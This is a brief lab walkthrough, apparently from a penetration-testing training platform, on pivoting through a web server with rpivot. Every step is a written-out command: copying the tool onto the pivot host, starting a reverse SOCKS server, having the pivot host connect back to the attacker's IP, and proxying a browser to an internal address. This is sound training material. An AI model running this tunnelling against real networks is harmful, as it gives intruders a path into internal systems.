Web Server Pivoting with Rpivot

June 23, 2024

ssh ubuntu@10.129.78.39

First we have to transfer the rpivot file in the pivot machine from attack machine

scp -r rpivot/ ubuntu@10.129.78.39:/tmp

Then we will open our server from attack machine

python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Then we will connect the pivot machine to it

python2.7 client.py --server-ip 10.10.14.199 --server-port 9999
sudo subl /usr/local/etc/proxychains.conf
cd ~/proxychains
./proxychains4 firefox 172.16.5.135:80

Last updated